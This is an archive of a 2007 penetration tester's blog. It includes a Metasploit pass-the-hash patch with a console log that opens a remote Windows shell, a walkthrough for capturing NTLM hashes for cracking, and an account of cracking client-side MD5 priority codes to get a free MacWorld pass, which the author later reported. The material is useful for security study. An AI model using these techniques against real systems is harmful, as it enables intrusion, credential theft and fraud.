Thursday, November 15, 2007

IE Trust Zones

This week is the joint OWASP/WASC conference in San Jose. Two days of web app nerds getting together and exchanging ideas about CSRF protections, web services, the Samy worm, etc. It's loads of fun! I'm a big OWASP supporter and push their information wherever possible. I'm always shocked when I hear "I've never heard of them" from a developer.

Rsnake gave a presentation/rant about the sorry state of web security. Not that it's something that was created out of malice, just that we're seeing issues today that were never part of the original concept of the web. Just like spam was never on the minds of Ray and Dick when they created electronic mail.

He briefly mentioned one of my favorite topics - Windows hashes. Then I read his blog entry describing Natron's ideas for using DNS Pinning to affect the IE Trust Zone. It's an area I was thinking of but hadn't worked on yet because I was focused on the insider attack space. Awesome!

Of course there are a few complications with the theory that have to be considered:
  1. If the attacker doesn't send the domain name in the Type message that the victim's computer is a member of, a dialog box will appear. People may still put their passwords in but the idea of mass transparent authentication capture isn't there.
  2. IE Trust Zones are pretty akward in design. What constitutes an Intranet Zone site? Microsoft KB174360 says: By default, the Local Intranet zone contains all of the network connections that were established by using a Universal Naming Convention (UNC) path, and Web sites that bypass the proxy server or have names that do not include periods (for example, http://local), provided that they are not assigned to either the Restricted Sites or Trusted Sites zone.
  3. If a company is using a proxy server and you DNS Pin a name that doesn't have a FQDN at the end, that address may never be reached because IE won't use the defined proxy and attempt to connect directly to the attacker's IP address.
Another option I was thinking of would be somehow creating a Java or Flash proxy server but unfortunately their sandboxes have locked down any bind requests (unless someone has some mojo that gets around this). Flash doesn't support it and Java doesn't permit binds in applets.

In any event the patch to Metasploit adding NTLM type message parsing was submitted back in October. I have some updates to send in but it's still functional. The pre-defined nonce hash catcher (pokehashball.rb) script is fairly complete and the HTTP-to-POP3 tool (psyduck-pop3.rb) is fun to play with. None of these attacks have been incorporated into Metasploit modules yet but that's still on the radar (smb_relay via HTTP).

Visit http://grutz.jingojango.net/exploits/pokehashball.html for the code.

Full Disclosure: This attack was first documented by Jesse Burns at iSec Partners using jCIFS. Where's your code, Jesse? :)

Friday, October 26, 2007

Announcing BerkSec

Continuing the tradition of (NY|Chi|Bay|*)Sec groupings of infosec people without a vendor bent, announcing BERKSEC 0001 - just because, why not, it's not in SF.

Come on by the Albatross Pub on Tuesday, Oct 30 at 7:30 or 8pm or later... Look for the long haired guy with a Toorcon t-shirt and join us.

Thursday, October 25, 2007

NTLM Hash Update

Things got a little busy/crazy around here so I'm not satisfied with what I have done so far so no code yet. This past weekend was Toorcon 1001 and it was as enjoyable as ever. I had a few breakthrough ideas thanks to the talks and side chats with everybody. That's mostly why I'm not satisfied -- always room for improvement. :)

I promise to show something soon. Really.

Friday, October 12, 2007

NTLM Hashes Like Pokemon

I recently finished up a patch to Metasploit that processes NTLM Type Messages. These are the negotiated messages when authenticating to HTTP(S), IMAP, POP3 or SMTP. If you follow the svn trunk of Metasploit the support is there. Hopefully this weekend I'll finalize everything for a cool release.

Friday, August 24, 2007

VMWare Fusion Doesn't Play Nice With BPF

For a while now I've been avoiding a problem with NMap and OS/X w/ VMWare Fusion installed. It's been posted about a few times on the mailing list and I always say "just shut Fusion down for it to work." Yeah, it works but it's not a real solution.

So I spent a few minutes today to figure out just WHY this is happening. Turns out my original assumption of Fusion not building "valid" interfaces is partly correct. The "vmnet[x]" interfaces can not be opened with BPF! I wrote a quick program to check it out:
macpro:~ grutz$ sudo ./testbpf vmnet8
ERROR: Device not configured
ktrace validates:
2721 testbpf CALL ioctl(0x83,0x8020426c ,0xbffffb28)
2721 testbpf RET ioctl -1 errno 6 Device not configured
So VMWare isn't creating valid interfaces. No tcpdump for you (and no nmap)! The solutions so far have been to shutdown the interfaces but what if you need to keep Fusion up and running?

Here's a quick and dirty patch applied to tcpip.cc that will skip over the vmnet interfaces. Until Fusion fixes their set up this is the only way it'll work.
/* skip broken VMWare Fusion vmnet interfaces */
#ifdef MACOSX
if (strncmp(ifr->ifr_name, "vmnet", 5) == 0)
continue;
#endif
Sigh.

Wednesday, August 08, 2007

Chaos Camp 2007: The beginning!


Short and brief here. Surprisingly we all made it here in time to defend our freedoms and set up camp before another group could claim. Of course since we're the American Embassy here we would've taken the land anyways. We're Americans, whats yours will soon be ours!!

To be honest I'm really amazed at everything here. The people are awesome, the environment couldn't be better and the number of unique camps, activities and talks available simply can not be beat. If you're awake at 4am PST you can watch the talks live at http://events.ccc.de/camp/2007/Streams

Sunday, July 29, 2007

Defcon and Chaos Camp 2007


This weekend is DefCon 16. All signs say this year is going to be just as big, if not bigger, than it's been in the past. Part of me misses the Alexis Park experience. It felt more homely, more tightly knit together than at a casino. Maybe it's just me. :)

I'll also be a part of the Hackers on a Plane! We're flying right after DC to the Chaos Computer Camp. I've lamented often to friends on how disjointed we are, specifically within the Bay Area, as a community of hackers. I'm not one to talk because I'm just as bad about staying home and keeping things to myself as the rest of us. Hopefully CCC.de will help invigorate me to make some changes. This little spot on the Internet has helped a little. I no longer feel like an evil anti-social hacker -- ok, maybe a little.

Hope to see everyone there!

Thursday, July 19, 2007

eEye's BinDiffing Suite for IDA Pro 5.1

It's been a while since I've posted anything, mostly because I've been very busy changing jobs, starting a penetration testing group from the ground up. That plus all the initial new employee training have eaten up a lot of my time.

One thing we'll be doing is Binary Diffing. I fully believe every good penetration tester should be able to understand assembly, research new vulnerabilities and reverse engineer in some capacity. A good binary diffing program helps a LOT!

While I was waiting for our purchasing department to order Sabre's BinDiff I took a look at eEye's BinDiffingSuite. With my copy of IDA 5.1 installed I downloaded the tool and started the installation. I'm soon greeted with a message saying:

...requires requires IDA Pro Standard v5.0 or IDA Pro Advanced v5.0

During this month's eEye vulnerability forum I asked if there were any plans to update the tool to support IDA 5.1. Hackers take note - Alex's response is "We all use 5.0 here and it works well." Uh, aren't there are known vulnerabilities against IDA 5.0? Are you guys running out-dated software?!

Flame baiting aside, the MSI file is doing a very simple check for installed IDA versions. Here's how you can get it installed and running with the latest (and more secure.. ahem) version of IDA. The IDA SDK has been pretty stable since v4.9 so the suite works with v5.1 without hassle:
  1. Open RegEdit and go to the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IDA Pro_is1
  2. Change the DisplayName to say "IDA Pro Standard v5.0" or "IDA Pro Professional v5.0"
  3. Re-rerun BinDiffSuite.exe and install
  4. Change it back to what it was previously (if you want)
  5. Have fun!
This really is a nice suite of tools. Big kudos to eEye for releasing it and including source code!

Wednesday, May 23, 2007

Intel ISACA Intel ISACA Inside

In today's San Francisco Chronicle, David Lazarus writes on how Intel protects its trademarked name. I found it funny in relation to my friend's little ISACA episode I posted about. While I can understand that a company has to be vigilant with ensuring somebody isn't devaluing their name or causing consumer confusion but some things are just a little too surreal.

In this case Intel is saying a woman whose business is selling houses in the VA/DC/MD area can't use the name "IntelAgent" because it would like cause confusion. Their option was to use "IntelliAgent" since the intent was to combine the words "Intelligent" and "Agent" together - IntelAgent!

Of course "IntelliAgent" works if you're from the south where extra syllables (syl-ah-buhls) are added willy-nilly. IntelliAgent (in-tell-ee-ah-gent), "I is intelliagent."

Wednesday, May 09, 2007

Pass The Hash Support for Metasploit

Surprisingly Metasploit 3's SMB auth routines didn't support "pass the hash" so I took some time and put it in.
msf exploit(ms06_040_netapi) > set SMBPass 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
SMBPass => 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
msf exploit(ms06_040_netapi) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(ms06_040_netapi) > exploit

[*] Started bind handler
[*] Doing pass the hash.
[*] LM: 6A98EB0FB88A449CBE6FABFD825BCA61
[*] NT: A4141712F19E9DD5ADF16919BB38A95C
[*] Detected a Windows 2000 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.110.130[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.110.130[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Command shell session 1 opened (192.168.110.1:42485 -> 192.168.110.130:4444)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
The Patch:

Index: lib/rex/proto/smb/client.rb
===================================================================
--- lib/rex/proto/smb/client.rb (revision 4889)
+++ lib/rex/proto/smb/client.rb (working copy)
@@ -568,8 +568,13 @@

raise XCEPT::NTLM1MissingChallenge if not self.challenge_key

- hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.challenge_key) : ''
- hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.challenge_key) : ''
+ if (pass.length == 65)
+ hash_lm = CRYPT.e_p24( [ pass.upcase()[0,32] ].pack('H42'), self.challenge_key)
+ hash_nt = CRPYT.e_p24( [ pass.upcase()[33,65] ].pack('H42'), self.challenge_key)
+ else
+ hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.challenge_key) : ''
+ hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.challenge_key) : ''
+ end

data = ''
data << hash_lm
@@ -690,7 +695,11 @@
nonce = CRYPT.md5_hash(self.challenge_key + client_challenge)

# Generate the NTLM hash
- resp_ntlm = CRYPT.ntlm_md4(pass, nonce[0, 8])
+ if (pass.length == 65)
+ resp_ntlm = CRYPT.e_p24( [ pass.upcase()[33,65] ].pack('H42'), nonce[0, 8])
+ else
+ resp_ntlm = CRYPT.ntlm_md4(pass, nonce[0, 8])
+ end

# Generate the fake LANMAN hash
resp_lmv2 = client_challenge + ("\x00" * 16)

Tuesday, May 08, 2007

ISACA ISACA ISACA

Yesterday a friend of mine related a rather interesting tale. Like a lot of security-minded individuals he owns a domain and uses a unique username when giving out an e-mail address. Like "bugtraq@hisdomain.com" or "amazon@hisdomain.com" etc. The idea is when you receive spam for that username you can easily figure out who it was that released your e-mail address and reprimand, sue, jump up and down in a frenzy, and so on.

He recently passed the CISM exam from ISACA. He hadn't heard anything from them for a while so he calls them up. The conversation goes a little like this:

Him: Hi, I haven't received anything about my CISM. You said I passed but I don't have a certificate or anything yet.

ISACA: That's not right, let me look up your information. What's your (blah blah blah)

ISACA: Oh. I see, you're using ISACA in your e-mail address. That's trademarked and you can't do that.

Him: Really? That's really a strange policy. Make it hisname-ISACA@hisdomain.com then.

ISACA: I'm sorry, that's still in violation of the trademark.

Him: I don't beli... Fine, just remove the e-mail address entirely.

ISACA: But then we have no e-mail address and can't complete your certification.


I'm no lawyer but I believe in order to be violating a Trademark there has to be some potential or perceived confusion in the marketplace. At least that's how I read 15 U.S.C. 1125(c). If my friend's intent was to market himself as ISACA@hisdomain.com as being the real ISACA then I could see there being a clear violation that should be legally challenged.

There is a "Cyberprivacy" section of 1125(c) but that deals only with DOMAIN NAMES and not the username portion of an e-mail address. Also there's this little tidbit:
(i) has a bad faith intent to profit from that mark, including a personal name which is protected as a mark under this section;
How can ISACA really know his intent? I don't really understand the thought process that any mention of ISACA without the ® sign means the user is an infringer. Anyone?

Tuesday, April 24, 2007

NTLMv1, Metasploit and You

In Metasploit 2.7 there existed a moduled called "smb_sniffer" that listened as a Windows SMB server, responded to negotiations with a preset challenge and forced crypto to NTLMv1. When I asked the devs about it they said it was for "future purposes."

That future purpose is now documented!

Step 1 - Download my slightly updated version from here and place it in your exploits/ directory.

Step 2a - Run it with root privs on a UNIX host (doesn't work on Windows, sorry).
Step 2b - Have a Windows machine connect to your "share" - they will get an access denied but stuff like will work.


Step 3 - Send the hashes to Cain & Abel for cracking or cryptanalysis! Obtain the HALFLMCHALL tables from FreeRainbowCrack.Com or run a brute force, dictionary, hybrid, etc.


Step 4 - Success!


One caveat -- the half-lm challenge table only does the first 7 characters of LANMAN. You still have to brute force the last 7 and if the user's password is greater than 14 characters, you're really out of luck.

Enjoy! :)

Friday, April 13, 2007

Frameworks are not auto-hackers

I was reading a review of the Yoggie Gatekeeper Pro in this month's SC Magazine. It's a neat little device that hides your PC behind a Linux firewall-appliance when connecting to an untrusted network. The voodoo of how it shims itself into your Windows networking stack so you can connect to a wireless network and still be protected through the Yoggie aside -- one thing about the review really made my hair bristle:
Using our vulnerability assessment tool (NetClarity) and our penetration tool (Core Impact) we were unable to compromisethe Gatekeeper or the computer behind it.
- SC Magazine, April 2007, Pg 63
Well duh.

Both the tools listed are only as strong as their signatures, exploits and platform shellcode. That statement is like running Core Impact against a copy of OpenVMS and saying IMPENETRABLE! when you're done. Technically it's valid but it's no measure of strength.

Maybe these statements are made because of a contractual obligation. "Say our product name five times and we'll give you free copies" sort of thing. Unfortunately there will be InfoSec managers and the like who will listen and wonder if maybe they should use these tools in lieu of hiring security professionals who actually know something.

Maybe I'm just being too overly critical and hypersensitive about this. I don't think I am as I've looked at a number of Web Application Security tools on the market and none of them have been able to find the more serious vulnerabilities vs. a team of two or three highly skilled testers have. We still need good QA but attack Frameworks like CORE Impact, Canvas and Metasploit aren't automated tools. Don't treat them as such.

Wednesday, March 28, 2007

Security Opus - a week later

Security Opus rocked. Very laid back attitude (hey, it's San Francisco). Free drinks every night - thanks Microsoft, Richard and other sponsors! Great speakers and talks. Networking with friends in a relaxing environment. We'll do it again in September I think. BE THERE!

Some of the topics you missed that I liked (and can remember right now):
  • Stefano Zanero ranted about Intrusion Detection|Prevention Systems. Stuff many of us have been saying for a long time like "Real-time response is not really possible" but he had the math and pretty graphs to prove it to management. IDS isn't dead but it's never been a killer app in my opinion. It is still very important to have in any environment.
  • Cedric Blancher's presentation on 802.11 security was insightful and I spoke with a few people who hadn't yet heard about all of the attacks before.
  • Shawn Merdinger from VOIPSA showed a few of VoIP's problems. He's primarily focused on client/handset issues vs protocol weaknesses or server issues but his liquid-fueled talk was informative and put the spark back in me to finish setting up an asterisk server. So many projects, so little time!
  • Matt Hargett and Luis Miras have very strong opinions on source code analysis for vulnerabilities. It's a topic I'm looking into this year for work and understand it's a very difficult problem with no real good answer.
  • Whoever named it "Web 2.0" should stop trying to name things. I'm tired of seeing crap about "Web 2.0". Every time somebody says it in a presentation, God kills a puppy or kitten from a no-kill shelter.
There were other talks about crytovirology, botnets, etc. Show your support and come in September. My favorite quote from Richard Thieme: "Foreclose on the antelope!"

Richard cracks me up sometimes, especially when he and Simple Nomad get to talking about UFOs and secret government projects (last year's SecurityOpus).

In other news, some more projects, exploits and scripts will be uploaded sometime this week when I get around to cleaning them up. It's been a busy week.

Thursday, March 08, 2007

Exploit frameworks are the best

This week I wrote an exploit for a JRun vulnerability released in 2002! I was proud of myself as we rarely get the chance to write an overflow during a penetration test. Usually it's all web exploits, unpatched windows systems, poor administration, etc. My friend said we found "the oldest box on his network." So much for "no public exploits exist" as a mitigation! HA!

The hardest part of all this was getting a copy of the JRun software installed and running in a VM. It was so old the company (Allaire) had been bought twice so no installers could easily be found! A few hurdles later and within half a day I had a stable module written for Metasploit. Later in the evening I wrapped one up for Canvas. I don't have a copy of CORE Impact - it's a little expensive and, well, we do alright with what we have. :)

Dave Aitel once said he envisioned a future of exploit writing becoming a marketplace where they can be sold by third parties like ActiveX objects were in the early days of IE. Needed to do some video? Here's a library that'll help!

To be honest I don't see that happening. There's little value for me to spend some amount ($100 to $5000?) for a single exploit that may or may not work to "prove" the system is vulnerable. There's so much wiggle area when exploiting a system, even with the protections provided by today's frameworks, that it'll just be too unreliable. I'd have a hard time justifying the cost but maybe that's just me.

There's been talk on the Metasploit mailing list of putting together an exploit module repository. Something centralized that can be maintained by developers. I've been searching for a project, maybe this will be it. :) Anyone else that's interested drop me a line. I envision a Trac Wiki + SVN repository with some core supporters and community submissions/requests. Of course we'll have to weed out the 100s of "writemesumthin 2 hax myspace/yahoo/aim" but that's part of the fun!

Until then.. enjoy my meager contributions: http://grutz.jingojango.net/exploits/

SecurityOPUS is coming up March 19-21 here in San Francisco. It's an awesome conference and I highly recommend coming -- registration is still open. We don't have many get-togethers here for some reason other than big marketing events like RSA. There's a lot of talent in the bay area and this is a great way for the security community to come together more. Come! Learn! Enjoy! Eat some great food on Rich's dime! Then later come to our OWASP meetings. They're lots of fun and free beer when iSEC Partners hosts. :)

Wednesday, February 21, 2007

Google Desktop? Upgrade time!

The security freaks at Watchfire recently released an amazing piece of research against Google Desktop. If you use this product it's best to update it now.

PDF and an awesome Adobe Flash presentation are worth checking out.

Essentially through Cross-site Scripting and a Javascript command and control API they've shown the ability to fully compromise a device. All of it can be automated.

As a web user I've been afraid of client-side language interpreters for a long time. Javascript, ActiveX, Java, etc -- they take too much control away from my PC and give it to web servers. Blogs, forums, malicious trojan servers, etc all can carry dangerous payloads that will run unnoticed to me because that's how the user experience is.

This year is going to be fun. :)

Friday, February 02, 2007

Owning a lot of football fans

This morning I awoke to find an urgent posting from Websense. Somebody had placed a bit of javascript on the Dolphin Stadium website @ http://www.dolphinstadium.com/. Don't worry, it's not there anymore. This weekend is the Superbowl and a LOT of football could very well visit this site and if they haven't updated their Internet Explorer in a while they'd find a keylogger and backdoor installed on their PC.

A pretty big issue that was resolved fairly quickly by the host removing the offending source but our comfort level with that site is shaky now. How did the attackers get in, did they close the hole or just put some silly putty over it? We may never know.

The malicious code turns out to be a javascript file called 3.js loaded from a website named dv521.com. A very quick googledork search found something interesting:



The CDC's podcast site! They've since brought down their system for repairs.

The dv521.com site has been removed as well but how many people already had their machines trojaned?

This attack is called "Persistent Cross Site Scripting (XSS)." in that the malicious JavaScript code gets left behind on the web application, usually as a database entry that is displayed at some point during the user's experience. When a somebody goes to visit the website the malicious code is loaded and, in this particular case, bad things happen to the browser if it hasn't been patched against two recent Microsoft bugs (MS06-014 and MS07-004).

There are a lot of XSS bugs out there. Michael Sutton did a massive check and reliably confirmed that out of 272 sites, 47 (17.3%) of them had a XSS vulnerability. The XSS Wall of Shame at the sla.ckers.org forum never stops, most of them being non-persistent.

Browsing the web with a JavaScript-enabled browser is just plain dangerous. It's not just those 'seedy' underground sites you should avoid, it's everywhere.

Some very good resources on XSS and its very real threats:

Thursday, January 25, 2007

How to kill an Internet Domain

Yesterday in a posting to the nmap-hackers mailing list, Fyodor described a very chilling attack against his domain. This wasn't a technical attack, it didn't require any special software or programming knowledge. All it took was that you have a name behind you to bully somebody else.

I woke up yesterday morning to find a voice message from my domain registrar (GoDaddy) saying they were suspending the domain SecLists.org. One minute later I received an email saying that SecLists.org has "been suspended for violation of the GoDaddy.com Abuse Policy". And also "if the domain name(s) listed above are private, your Domains By Proxy(R) account has also been suspended." WTF??! Neither the email nor voicemail gave a phone number to reach them at, nor did they feel it was worth the effort to explain what the supposed violation was. They changed my domain nameserver to "NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM". Cute, eh?

What could possibly cause such a response? The storage of the public mailing list (Full Disclosure) for all to see via HTTP or RSS-feeds.

A user on 01/15/07 posted a long text file of phished Myspace accounts which included e-mail addresses and passwords. This kind of data is often traded in underground circles, usually free porn logins, but rarely do we see these things so brightly displayed for all to see and archive.

Full Disclosure is freely open to all. It's supposed to be that way for a multitude of reasons. Unfortunately this means child-minded individuals sometimes feel it's their duty to troll. Fyodor recently has been the receiver of DMCA requests from the infamous Michael Crook to remove posts from SecLists.org, claiming to hold the copyright of a picture of a penis posted by previously mentioned trolls.

Because Michael Crook is not the Fox Corporation he couldn't sufficiently bully a domain provider into closing down a domain and potentially all other registered domains. Lucky for all of us.

Something is seriously wrong here. Are we so afraid that we shoot first and ask questions later? This isn't DMCA here, this is simple bullying and hiding behind "Terms of Service" wording. I think Fyodor has a strong legal case against GoDaddy and Fox for this action but since he charges no money it might be difficult to show any damages. Of course I'm no lawyer and live in Berkeley so take it as you will.. :)

There have been other cases, mostly against 'whistleblower' sites and blogs, of strong-arm tactics being used against somebody who can't fight back. Scientology and the Internet have a very rocky history for example. Had Fox simply sent an e-mail to Fyodor he would have probably removed it or heavily modified it to be of no use. I'm just guessing here.

The cat is out of the bag on the list anyways (like OTIII already is). Mailing lists like Full Disclosure are sent to thousands of e-mail addresses so the good and the bad already have this information. By publicly posting the list the phishers have invalidated those accounts and brought to the public just how easy and troublesome phishing truly is. It's easy to find yourself caught because if it's done well you'll never know it happened.

Thursday, January 11, 2007

Your Free MacWorld Expo Platinum Pass (valued at $1,695)

Happy new year everybody! Here's a little secret for web developers: client-side verification of user data is sometimes ok, but back it up with a server verification AND don't give important/secret stuff to the client.

I wanted to head over to MacWorld this week and obtained a "PC" code for a free Expo pass. That's cool and all but it doesn't get me access to see Jobs' keynote unless I sneak in. Plus if I got a regular badge I wouldn't have priority seating, something you really need since everyone and their goat flocks to hear Jobs say "One more thing..." But, alas, I'd only receive an Expo pass.

I plug in the register URL and start inserting my information. The second screen is where your Priority Code gets entered. Being the curious person I am I took a peek at the source code. Much to my chagrin I find this:


Well huh. These look like MD5 hashes. Lets look a little deeper in the code. On line 2515 there's a javascript function named "check_password" which is called any time the Priority Code field changes. Let's see what it does:
  1. Convert the cleartext to upper-case and strip invalid characters
  2. Calculate the MD5 of the new cleartext
  3. Check the list of valid_codes for the MD5(cleartext)
  4. Pop an alert box if the code isn't found
So what we need to do is crack the MD5 passwords with what we know about our keyspace: All upper case, most likely keyboard ASCII characters and numbers only. We can probably rule out non-printable ASCII so now we're just looking at A-Z0-9. Just an educated guess.

A quick conversion of the javascript to "code#:md5hash" and a quick addition to John The Ripper's rules:

[List.External:AlNum_Upper]
void filter()
{
int i, c;

i = 0; // Convert to uppercase
while (c = word[i]) {
if ((c < 'a' || c > 'z') &&amp; (c < '0' || c > '9')) {
word = 0; return;
} else {
if (c >= 'a' &&amp; c <= 'z') word[i] &= 0xDF; } i++; } }


We begin the crack:
$ john --format=raw-MD5 --incremental=alnum --external=alnum_upper macworld.codes
Loaded 897 password hashes with no different salts (Raw MD5 [raw-md5])
CREDIT (1183)
guesses: 1 time: 0:00:00:09 c/s: 20372K trying: ADRY
Less than 10 seconds and I've already cracked a code that looks interesting. Lets see what we get:



A Platinum Pass for $0.00? Special line access to the Keynote! Alright!

So it looks like a combination of client-side authentication with all data being delievered to the end user. OWASP has a very good description of this vulnerability here. Utlimately you don't want to give the client everything they need to gain access to something they shouldn't. Validate on the server rather than the client and keep the keys secret. Of course you also shouldn't use a very easy key that will provide discounted access (CREDIT ? Hmmmpf!)

But did it work? You need a government ID or credit card to receive your badge at the conference. Not a very hard thing to forge but no need to as I used my real initials. The badging people gave me an odd look at the pick-up window but everything matched and voila:


This was discovered and verified on Monday, 1/8/07 by picking up the above badge. On Tuesday I e-mailed IDG to report it and met with the web support team at MacWorld to say hi, hows it going, yeah this didn't take long to figure out, you gave me everything I needed to know in the code, etc. They're very nice people and were happy to discuss this issue and about web security in general. They'd spent most of the day looking back over their logs and found that others also had found this vulnerability and used it but I was the only one to report it.

Given what's mentioned in this article from CSO Online I can understand why that is. This experience helped me feel that it's not always a strong-arm, FBI jackbooted thug response for finding a web application vulnerability. Then again I only learned how to defraud a company of $1,695 (per instance) and didn't try to access a database containing credit cards, social security numbers, etc.

I made a video of the hack but it was after I talked to IDG so the final page doesn't show $0.00 anymore. Oh well, it'll give you the general idea of the vulnerability and how long it could take to figure out. As soon as it's finished I'll post it.

Wednesday, January 10, 2007

One platform to bind them...almost

This year was my first time going to the MacWorld Expo. My family has always had one form of a Macintosh ever since they were first introduced in 1985. Only recently did I finally purchase one for myself, primarily because I knew the shift to Intel processors would be a great big thing for all of computing.

That's become true because the wide gap between Windows and OSX has nearly been bridged:
  • Bootcamp allows running of Windows XP/Vista on Apple hardware
  • Parallels Workstation lets you run your Bootcamp XP/Vista partition (or any other OS) along with your OS X so application migration
  • CodeWeaver's Crossover Mac integrates their outstanding work with the WINE project to fill the gap where Parallels doesn't fit yet (No requirement to regularly support a Windows instance, gaming functionality, etc)
As a security professional I find myself having to use a lot of different operating systems regularly and to not have to lug around two or three laptops when I travel would be a tremendous boost to my own productivity, let alone my back. These products are starting to make this a reality.

Sure I use and dearly love VMWare, and they do have a beta version for the Intel Mac, but it's best to be able to stay in touch with the current trends. To be honest Apple makes visually and ergonomically sweet hardware. Their software still has some growing to do. (MOAB, Bastille)

There are still many features missing out of both VMWare and Parallels' OSX virtualization software. The main thing being SNAPSHOTS! Any vulnerability research worth their salt has at least XP, 2K and 2K3 VMWare snapshots with SP0, SP1, SP2, SP3, etc. Parallels says they'll have this Real Soon Now(tm) so I'm hoping for the best. I just dread having to rebuild my images as I'm sure they won't magically migrate.

The actual Expo wasn't anything special to me. Lots of iPod accessories, lots of external drive vendors, lots of bag vendors, bits and pieces of innovation here and there. Some very cool things here and there but other than Apple's iPhone I wasn't really blown away by anything.

Hello to IDG's web dev guys. You've got my name, e-mail and number - I'm sure you'll want to talk more after my next post. :)

Tuesday, January 09, 2007

MadWIFI and Karma update

The latest version of MadWIFI (0.9.2.1) does not work with the Karma patches I have. It's been on my list of things to get to but just haven't had the time to dedicate.